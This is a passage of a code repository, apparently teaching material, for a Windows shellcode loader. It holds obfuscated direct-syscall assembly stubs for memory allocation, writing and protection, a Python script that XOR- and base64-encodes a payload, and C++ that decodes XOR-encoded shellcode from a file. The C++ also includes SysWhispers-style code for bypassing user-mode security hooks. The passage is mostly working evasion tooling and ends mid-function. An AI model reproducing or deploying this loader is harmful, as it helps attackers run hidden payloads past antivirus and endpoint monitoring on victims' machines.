<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="base64.cpp" />
<ClCompile Include="demo1.cpp" />
<MASM Include="nt.asm">
<FileType>CppCode</FileType>
</MASM>
</ItemGroup>
<ItemGroup>
<ClInclude Include="base64.h" />
<ClInclude Include="Header.h" />
<ClInclude Include="nt.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
================================================
FILE: chapter4-demo2/demo1/demo1.vcxproj.filters
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
<Filter Include="Resource Files\Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="demo1.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="base64.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="Header.h">
<Filter>Resource Files</Filter>
</ClInclude>
<ClInclude Include="base64.h">
<Filter>Resource Files\Header Files</Filter>
</ClInclude>
<ClInclude Include="nt.h">
<Filter>Resource Files\Header Files</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<MASM Include="nt.asm">
<Filter>Source Files</Filter>
</MASM>
</ItemGroup>
</Project>
================================================
FILE: chapter4-demo2/demo1/demo1.vcxproj.user
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>
================================================
FILE: chapter4-demo2/demo1/nt.asm
================================================
.code
bye :
ret
BNtAVM proc
mov r8, r10
mov r10, 01h
xor r10, r10
mov r10, 0Ah
mov r10, rcx
xor eax, eax
sub r8, r10
add eax, 18h; 1507 +
xor r8, r8
syscall
ret
BNtAVM endp
BNtWVM proc
add rcx, 0Ah
xor eax, eax
mov r10, rcx
add eax, 3Ah; 1507 +
sub r10, 0Ah
sub rcx, 0Ah
syscall
ret
BNtWVM endp
BNtPVM proc
add r10, 1Ch
xor eax, eax
mov r10, rcx
sub r10, 01h
add eax, 50h; 1507 +
add r10, 01h
syscall
ret
BNtPVM endp
end
================================================
FILE: chapter4-demo2/demo1/nt.h
================================================
#pragma once
#include <Windows.h>
#define STATUS_SUCCESS 0
EXTERN_C NTSTATUS BNtAVM(
HANDLE ProcessHandle,
PVOID* BaseAddress,
ULONG_PTR ZeroBits,
PSIZE_T RegionSize,
ULONG AllocationType,
ULONG Protect
);
EXTERN_C NTSTATUS BNtWVM(
HANDLE hProcess,
PVOID lpBaseAddress,
PVOID lpBuffer,
SIZE_T NumberOfBytesToRead,
PSIZE_T NumberOfBytesRead
);
EXTERN_C NTSTATUS BNtPVM(
HANDLE ProcessHandle,
PVOID* BaseAddress,
SIZE_T* NumberOfBytesToProtect,
ULONG NewAccessProtection,
PULONG OldAccessProtection
);
================================================
FILE: chapter4-demo2/demo1/x64/Debug/demo1.exe.recipe
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project>
<ProjectOutputs>
<ProjectOutput>
<FullPath>E:\last\demo1\x64\Debug\demo1.exe</FullPath>
</ProjectOutput>
</ProjectOutputs>
<ContentFiles />
<SatelliteDlls />
<NonRecipeFileRefs />
</Project>
================================================
FILE: chapter4-demo2/demo1/x64/Debug/demo1.log
================================================
demo1.vcxproj -> E:\last\demo1\x64\Debug\demo1.exe
================================================
FILE: chapter4-demo2/demo1/x64/Debug/demo1.tlog/demo1.lastbuildstate
================================================
PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:
Debug|x64|E:\last\demo1\|
================================================
FILE: chapter4-demo2/demo1/x64/Release/demo1.exe.recipe
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project>
<ProjectOutputs>
<ProjectOutput>
<FullPath>E:\last\demo1\x64\Release\demo1.exe</FullPath>
</ProjectOutput>
</ProjectOutputs>
<ContentFiles />
<SatelliteDlls />
<NonRecipeFileRefs />
</Project>
================================================
FILE: chapter4-demo2/demo1/x64/Release/demo1.log
================================================
demo1.cpp
E:\last\demo1\demo1\header.h(6,67): warning C4312: “类型强制转换”: 从“unsigned int”转换到更大的“void *”
E:\last\demo1\demo1\demo1.cpp(29,10): warning C4244: “=”: 从“SIZE_T”转换到“DWORD”,可能丢失数据
E:\last\demo1\demo1\demo1.cpp(34,28): warning C4244: “参数”: 从“SIZE_T”转换到“DWORD”,可能丢失数据
E:\last\demo1\demo1\demo1.cpp(39,16): warning C4018: “<”: 有符号/无符号不匹配
E:\last\demo1\demo1\demo1.cpp(139,58): warning C4267: “初始化”: 从“size_t”转换到“DWORD”,可能丢失数据
E:\last\demo1\demo1\demo1.cpp(140,16): warning C4244: “初始化”: 从“SIZE_T”转换到“DWORD”,可能丢失数据
E:\last\demo1\demo1\demo1.cpp(145,3): warning C4244: “参数”: 从“SIZE_T”转换到“DWORD”,可能丢失数据
E:\last\demo1\demo1\demo1.cpp(144,3): warning C4244: “参数”: 从“SIZE_T”转换到“DWORD”,可能丢失数据
E:\last\demo1\demo1\demo1.cpp(153,20): warning C4018: “<=”: 有符号/无符号不匹配
E:\last\demo1\demo1\demo1.cpp(180,20): warning C4018: “<”: 有符号/无符号不匹配
E:\last\demo1\demo1\demo1.cpp(179,12): warning C4101: “cmm_i”: 未引用的局部变量
E:\last\demo1\demo1\demo1.cpp(175,18): warning C4101: “oldProt”: 未引用的局部变量
正在生成代码
已完成代码的生成
1 of 225 functions ( 0.4%) were compiled, the rest were copied from previous compilation.
0 functions were new in current compilation
0 functions had inline decision re-evaluated but remain unchanged
demo1.vcxproj -> E:\last\demo1\x64\Release\demo1.exe
================================================
FILE: chapter4-demo2/demo1/x64/Release/demo1.tlog/demo1.lastbuildstate
================================================
PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:
Release|x64|E:\last\demo1\|
================================================
FILE: chapter4-demo2/demo1.sln
================================================
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.28729.10
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "demo1", "demo1\demo1.vcxproj", "{1876F365-2DEC-42C9-B80E-B631B26FCAD8}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x64.ActiveCfg = Debug|x64
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x64.Build.0 = Debug|x64
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x86.ActiveCfg = Debug|Win32
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x86.Build.0 = Debug|Win32
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x64.ActiveCfg = Release|x64
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x64.Build.0 = Release|x64
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x86.ActiveCfg = Release|Win32
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {1F8E67EA-F3B7-42DD-84B6-2CD2AC0305B7}
EndGlobalSection
EndGlobal
================================================
FILE: chapter4-demo2/enc.py
================================================
import base64
with open("1.txt","rb") as f:
all=f.read()
array=[]
for i in all:
array.append(i^8)
#print(bytearray(array))
print(base64.b64encode(bytearray(array)))
================================================
FILE: chapter4-demo3/demo1/Debug/demo1.log
================================================
demo1.vcxproj -> E:\7bits_demo\demo1\demo1\Debug\demo1.exe
================================================
FILE: chapter4-demo3/demo1/Debug/demo1.tlog/demo1.lastbuildstate
================================================
#TargetFrameworkVersion=v4.0:PlatformToolSet=v142:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0
Debug|Win32|E:\7bits_demo\demo1\demo1\|
================================================
FILE: chapter4-demo3/demo1/Header.h
================================================
#pragma once
const int XOR_KEY{ 8 };
#include <vector>
const std::vector<LPVOID> VC_PREF_BASES{ (void*)0x00000000DDDD0000,
(void*)0x0000000010000000,
(void*)0x0000000021000000,
(void*)0x0000000032000000,
(void*)0x0000000043000000,
(void*)0x0000000050000000,
(void*)0x0000000041000000,
(void*)0x0000000042000000,
(void*)0x0000000040000000,
(void*)0x0000000022000000 };
================================================
FILE: chapter4-demo3/demo1/base64.cpp
================================================
/*
base64.cpp and base64.h
base64 encoding and decoding with C++.
More information at
https://renenyffenegger.ch/notes/development/Base64/Encoding-and-decoding-base-64-with-cpp
Version: 2.rc.08 (release candidate)
Copyright (C) 2004-2017, 2020, 2021 Ren?Nyffenegger
This source code is provided 'as-is', without any express or implied
warranty. In no event will the author be held liable for any damages
arising from the use of this software.
Permission is granted to anyone to use this software for any purpose,
including commercial applications, and to alter it and redistribute it
freely, subject to the following restrictions:
1. The origin of this source code must not be misrepresented; you must not
claim that you wrote the original source code. If you use this source code
in a product, an acknowledgment in the product documentation would be
appreciated but is not required.
2. Altered source versions must be plainly marked as such, and must not be
misrepresented as being the original source code.
3. This notice may not be removed or altered from any source distribution.
Ren?Nyffenegger rene.nyffenegger@adp-gmbh.ch
*/
#include "base64.h"
#include <algorithm>
#include <stdexcept>
//
// Depending on the url parameter in base64_chars, one of
// two sets of base64 characters needs to be chosen.
// They differ in their last two characters.
//
static const char* base64_chars[2] = {
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz"
"0123456789"
"+/",
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz"
"0123456789"
"-_" };
static unsigned int pos_of_char(const unsigned char chr) {
//
// Return the position of chr within base64_encode()
//
if (chr >= 'A' && chr <= 'Z') return chr - 'A';
else if (chr >= 'a' && chr <= 'z') return chr - 'a' + ('Z' - 'A') + 1;
else if (chr >= '0' && chr <= '9') return chr - '0' + ('Z' - 'A') + ('z' - 'a') + 2;
else if (chr == '+' || chr == '-') return 62; // Be liberal with input and accept both url ('-') and non-url ('+') base 64 characters (
else if (chr == '/' || chr == '_') return 63; // Ditto for '/' and '_'
else
//
// 2020-10-23: Throw std::exception rather than const char*
//(Pablo Martin-Gomez, https://github.com/Bouska)
//
throw std::runtime_error("Input is not valid base64-encoded data.");
}
static std::string insert_linebreaks(std::string str, size_t distance) {
//
// Provided by https://github.com/JomaCorpFX, adapted by me.
//
if (!str.length()) {
return "";
}
size_t pos = distance;
while (pos < str.size()) {
str.insert(pos, "\n");
pos += distance + 1;
}
return str;
}
template <typename String, unsigned int line_length>
static std::string encode_with_line_breaks(String s) {
return insert_linebreaks(base64_encode(s, false), line_length);
}
template <typename String>
static std::string encode_pem(String s) {
return encode_with_line_breaks<String, 64>(s);
}
template <typename String>
static std::string encode_mime(String s) {
return encode_with_line_breaks<String, 76>(s);
}
template <typename String>
static std::string encode(String s, bool url) {
return base64_encode(reinterpret_cast<const unsigned char*>(s.data()), s.length(), url);
}
std::string base64_encode(unsigned char const* bytes_to_encode, size_t in_len, bool url) {
size_t len_encoded = (in_len + 2) / 3 * 4;
unsigned char trailing_char = url ? '.' : '=';
//
// Choose set of base64 characters. They differ
// for the last two positions, depending on the url
// parameter.
// A bool (as is the parameter url) is guaranteed
// to evaluate to either 0 or 1 in C++ therefore,
// the correct character set is chosen by subscripting
// base64_chars with url.
//
const char* base64_chars_ = base64_chars[url];
std::string ret;
ret.reserve(len_encoded);
unsigned int pos = 0;
while (pos < in_len) {
ret.push_back(base64_chars_[(bytes_to_encode[pos + 0] & 0xfc) >> 2]);
if (pos + 1 < in_len) {
ret.push_back(base64_chars_[((bytes_to_encode[pos + 0] & 0x03) << 4) + ((bytes_to_encode[pos + 1] & 0xf0) >> 4)]);
if (pos + 2 < in_len) {
ret.push_back(base64_chars_[((bytes_to_encode[pos + 1] & 0x0f) << 2) + ((bytes_to_encode[pos + 2] & 0xc0) >> 6)]);
ret.push_back(base64_chars_[bytes_to_encode[pos + 2] & 0x3f]);
}
else {
ret.push_back(base64_chars_[(bytes_to_encode[pos + 1] & 0x0f) << 2]);
ret.push_back(trailing_char);
}
}
else {
ret.push_back(base64_chars_[(bytes_to_encode[pos + 0] & 0x03) << 4]);
ret.push_back(trailing_char);
ret.push_back(trailing_char);
}
pos += 3;
}
return ret;
}
template <typename String>
static std::string decode(String encoded_string, bool remove_linebreaks) {
//
// decode(? is templated so that it can be used with String = const std::string&
// or std::string_view (requires at least C++17)
//
if (encoded_string.empty()) return std::string();
if (remove_linebreaks) {
std::string copy(encoded_string);
copy.erase(std::remove(copy.begin(), copy.end(), '\n'), copy.end());
return base64_decode(copy, false);
}
size_t length_of_string = encoded_string.length();
size_t pos = 0;
//
// The approximate length (bytes) of the decoded string might be one or
// two bytes smaller, depending on the amount of trailing equal signs
// in the encoded string. This approximation is needed to reserve
// enough space in the string to be returned.
//
size_t approx_length_of_decoded_string = length_of_string / 4 * 3;
std::string ret;
ret.reserve(approx_length_of_decoded_string);
while (pos < length_of_string) {
//
// Iterate over encoded input string in chunks. The size of all
// chunks except the last one is 4 bytes.
//
// The last chunk might be padded with equal signs or dots
// in order to make it 4 bytes in size as well, but this
// is not required as per RFC 2045.
//
// All chunks except the last one produce three output bytes.
//
// The last chunk produces at least one and up to three bytes.
//
size_t pos_of_char_1 = pos_of_char(encoded_string[pos + 1]);
//
// Emit the first output byte that is produced in each chunk:
//
ret.push_back(static_cast<std::string::value_type>(((pos_of_char(encoded_string[pos + 0])) << 2) + ((pos_of_char_1 & 0x30) >> 4)));
if ((pos + 2 < length_of_string) && // Check for data that is not padded with equal signs (which is allowed by RFC 2045)
encoded_string[pos + 2] != '=' &&
encoded_string[pos + 2] != '.' // accept URL-safe base 64 strings, too, so check for '.' also.
)
{
//
// Emit a chunk's second byte (which might not be produced in the last chunk).
//
unsigned int pos_of_char_2 = pos_of_char(encoded_string[pos + 2]);
ret.push_back(static_cast<std::string::value_type>(((pos_of_char_1 & 0x0f) << 4) + ((pos_of_char_2 & 0x3c) >> 2)));
if ((pos + 3 < length_of_string) &&
encoded_string[pos + 3] != '=' &&
encoded_string[pos + 3] != '.'
)
{
//
// Emit a chunk's third byte (which might not be produced in the last chunk).
//
ret.push_back(static_cast<std::string::value_type>(((pos_of_char_2 & 0x03) << 6) + pos_of_char(encoded_string[pos + 3])));
}
}
pos += 4;
}
return ret;
}
std::string base64_decode(std::string const& s, bool remove_linebreaks) {
return decode(s, remove_linebreaks);
}
std::string base64_encode(std::string const& s, bool url) {
return encode(s, url);
}
std::string base64_encode_pem(std::string const& s) {
return encode_pem(s);
}
std::string base64_encode_mime(std::string const& s) {
return encode_mime(s);
}
#if __cplusplus >= 201703L
//
// Interface with std::string_view rather than const std::string&
// Requires C++17
// Provided by Yannic Bonenberger (https://github.com/Yannic)
//
std::string base64_encode(std::string_view s, bool url) {
return encode(s, url);
}
std::string base64_encode_pem(std::string_view s) {
return encode_pem(s);
}
std::string base64_encode_mime(std::string_view s) {
return encode_mime(s);
}
std::string base64_decode(std::string_view s, bool remove_linebreaks) {
return decode(s, remove_linebreaks);
}
#endif // __cplusplus >= 201703L
================================================
FILE: chapter4-demo3/demo1/base64.h
================================================
//
// base64 encoding and decoding with C++.
// Version: 2.rc.08 (release candidate)
//
#ifndef BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A
#define BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A
#include <string>
#if __cplusplus >= 201703L
#include <string_view>
#endif // __cplusplus >= 201703L
std::string base64_encode(std::string const& s, bool url = false);
std::string base64_encode_pem(std::string const& s);
std::string base64_encode_mime(std::string const& s);
std::string base64_decode(std::string const& s, bool remove_linebreaks = false);
std::string base64_encode(unsigned char const*, size_t len, bool url = false);
#if __cplusplus >= 201703L
//
// Interface with std::string_view rather than const std::string&
// Requires C++17
// Provided by Yannic Bonenberger (https://github.com/Yannic)
//
std::string base64_encode(std::string_view s, bool url = false);
std::string base64_encode_pem(std::string_view s);
std::string base64_encode_mime(std::string_view s);
std::string base64_decode(std::string_view s, bool remove_linebreaks = false);
#endif // __cplusplus >= 201703L
#endif /* BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A */
================================================
FILE: chapter4-demo3/demo1/demo1.cpp
================================================
// demo1.cpp : This file contains the 'main' function. Program execution begins and ends there.
//
#include <iostream>
#include <windows.h>
#include "header.h"
#include "base64.h"
#include "nt.h"
using namespace std;
unsigned char* ReadProcessBlob(const char* fnamSc, DWORD* szSc)
{
DWORD szRead{ 0 };
HANDLE hFile = CreateFileA(
fnamSc,
GENERIC_READ,
NULL,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (INVALID_HANDLE_VALUE == hFile)
return nullptr;
SIZE_T szFile = GetFileSize(hFile, NULL);
*szSc = szFile;
unsigned char* raw = new unsigned char[szFile];
unsigned char* sc = new unsigned char[szFile];
if (!ReadFile(hFile, raw, szFile, &szRead, NULL))
return nullptr;
int i;
for (i = 0; i < szRead; i++) {
sc[i] = raw[i] ^ XOR_KEY;
}
return sc;
}
std::string replace(const std::string& inStr, const char* pSrc, const char* pReplace)
{
std::string str = inStr;
std::string::size_type stStart = 0;
std::string::iterator iter = str.begin();
while (iter != str.end())
{
std::string::size_type st = str.find(pSrc, stStart);
if (st == str.npos)
{
break;
}
iter = iter + st - stStart;
str.replace(iter, iter + strlen(pSrc), pReplace);
iter = iter + strlen(pReplace);
stStart = st + strlen(pReplace);
}
return str;
}
LPVOID GetSuitableBaseAddress(HANDLE hProc, DWORD szPage, DWORD szAllocGran, DWORD cVmResv)
{
MEMORY_BASIC_INFORMATION mbi;
for (auto base : VC_PREF_BASES) {
VirtualQueryEx(
hProc,
base,
&mbi,
sizeof(MEMORY_BASIC_INFORMATION)
);
if (MEM_FREE == mbi.State) {
uint64_t i;
for (i = 0; i < cVmResv; ++i) {
LPVOID currentBase = (void*)((DWORD_PTR)base + (i * szAllocGran));
VirtualQueryEx(
hProc,
currentBase,
&mbi,
sizeof(MEMORY_BASIC_INFORMATION)
);
if (MEM_FREE != mbi.State)
break;
}
if (i == cVmResv) {
// found suitable base
return base;
}
}
}
return nullptr;
}
#ifdef _M_IX86
EXTERN_C PVOID internal_cleancall_wow64_gate(VOID) {
return (PVOID)__readfsdword(0xC0);
}
__declspec(naked) BOOL local_is_wow64(void)
{
__asm {
mov eax, fs: [0xc0]
test eax, eax
jne wow64
mov eax, 0
ret
wow64 :
mov eax, 1
ret
}
}
#endif
// Code below is adapted from @modexpblog. Read linked article for more details.
// https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams
SW3_SYSCALL_LIST SW3_SyscallList;
// SEARCH_AND_REPLACE
#ifdef SEARCH_AND_REPLACE
// THIS IS NOT DEFINED HERE; don't know if I'll add it in a future release
EXTERN void SearchAndReplace(unsigned char[], unsigned char[]);
#endif
DWORD SW3_HashSyscall(PCSTR FunctionName)
{
DWORD i = 0;
DWORD Hash = SW3_SEED;
while (FunctionName[i])
{
WORD PartialName = *(WORD*)((ULONG_PTR)FunctionName + i++);
Hash ^= PartialName + SW3_ROR8(Hash);
}
return Hash;
}
#ifndef JUMPER
PVOID SC_Address(PVOID NtApiAddress)
{
return NULL;
}
#else
PVOID SC_Address(PVOID NtApiAddress)
{
DWORD searchLimit = 512;
PVOID SyscallAddress;
#ifdef _WIN64
// If the process is 64-bit on a 64-bit OS, we need to search for syscall
BYTE syscall_code[] = { 0x0f, 0x05, 0xc3 };
ULONG distance_to_syscall = 0x12;
#else
// If the process is 32-bit on a 32-bit OS, we need to search for sysenter
BYTE syscall_code[] = { 0x0f, 0x34, 0xc3 };
ULONG distance_to_syscall = 0x0f;
#endif
#ifdef _M_IX86
// If the process is 32-bit on a 64-bit OS, we need to jump to WOW32Reserved
if (local_is_wow64())
{
#ifdef DEBUG
printf("[+] Running 32-bit app on x64 (WOW64)\n");
#endif
return NULL;
}
#endif
// we don't really care if there is a 'jmp' between
// NtApiAddress and the 'syscall; ret' instructions
SyscallAddress = SW3_RVA2VA(PVOID, NtApiAddress, distance_to_syscall);
if (!memcmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))
{
// we can use the original code for this system call :)
#if defined(DEBUG)
printf("Found Syscall Opcodes at address 0x%p\n", SyscallAddress);
#endif
return SyscallAddress;
}
// the 'syscall; ret' intructions have not been found,
// we will try to use one near it, similarly to HalosGate
for (ULONG32 num_jumps = 1; num_jumps < searchLimit; num_jumps++)
{
// let's try with an Nt* API below our syscall
SyscallAddress = SW3_RVA2VA(
PVOID,
NtApiAddress,
distance_to_syscall + num_jumps * 0x20);
if (!memcmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))
{
#if defined(DEBUG)
printf("Found Syscall Opcodes at address 0x%p\n", SyscallAddress);
#endif
return SyscallAddress;
}
// let's try with an Nt* API above our syscall
SyscallAddress = SW3_RVA2VA(
PVOID,
NtApiAddress,
distance_to_syscall - num_jumps * 0x20);
if (!memcmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))
{
#if defined(DEBUG)
printf("Found Syscall Opcodes at address 0x%p\n", SyscallAddress);
#endif
return SyscallAddress;
}
}
#ifdef DEBUG
printf("Syscall Opcodes not found!\n");
#endif
return NULL;
}
#endif
BOOL SW3_PopulateSyscallList()
{
// Return early if the list is already populated.
if (SW3_SyscallList.Count) return TRUE;
#ifdef _WIN64
PSW3_PEB Peb = (PSW3_PEB)__readgsqword(0x60);
#else
PSW3_PEB Peb = (PSW3_PEB)__readfsdword(0x30);
#endif
PSW3_PEB_LDR_DATA Ldr = Peb->Ldr;
PIMAGE_EXPORT_DIRECTORY ExportDirectory = NULL;
PVOID DllBase = NULL;
// Get the DllBase address of NTDLL.dll. NTDLL is not guaranteed to be the second
// in the list, so it's safer to loop through the full list and find it.
PSW3_LDR_DATA_TABLE_ENTRY LdrEntry;
for (LdrEntry = (PSW3_LDR_DATA_TABLE_ENTRY)Ldr->Reserved2[1]; LdrEntry->DllBase != NULL; LdrEntry = (PSW3_LDR_DATA_TABLE_ENTRY)LdrEntry->Reserved1[0])
{
DllBase = LdrEntry->DllBase;
PIMAGE_DOS_HEADER DosHeader = (PIMAGE_DOS_HEADER)DllBase;
PIMAGE_NT_HEADERS NtHeaders = SW3_RVA2VA(PIMAGE_NT_HEADERS, DllBase, DosHeader->e_lfanew);
PIMAGE_DATA_DIRECTORY DataDirectory = (PIMAGE_DATA_DIRECTORY)NtHeaders->OptionalHeader.DataDirectory;
DWORD VirtualAddress = DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
if (VirtualAddress == 0) continue;
ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)SW3_RVA2VA(ULONG_PTR, DllBase, VirtualAddress);
// If this is NTDLL.dll, exit loop.
PCHAR DllName = SW3_RVA2VA(PCHAR, DllBase, ExportDirectory->Name);
if ((*(ULONG*)DllName | 0x20202020) != 0x6c64746e) continue;
if ((*(ULONG*)(DllName + 4) | 0x20202020) == 0x6c642e6c) break;
}
if (!ExportDirectory) return FALSE;
DWORD NumberOfNames = ExportDirectory->NumberOfNames;
PDWORD Functions = SW3_RVA2VA(PDWORD, DllBase, ExportDirectory->AddressOfFunctions);
PDWORD Names = SW3_RVA2VA(PDWORD, DllBase, ExportDirectory->AddressOfNames);
PWORD Ordinals = SW3_RVA2VA(PWORD, DllBase, ExportDirectory->AddressOfNameOrdinals);
// Populate SW3_SyscallList with unsorted Zw* entries.
DWORD i = 0;
PSW3_SYSCALL_ENTRY Entries = SW3_SyscallList.Entries;
do
{
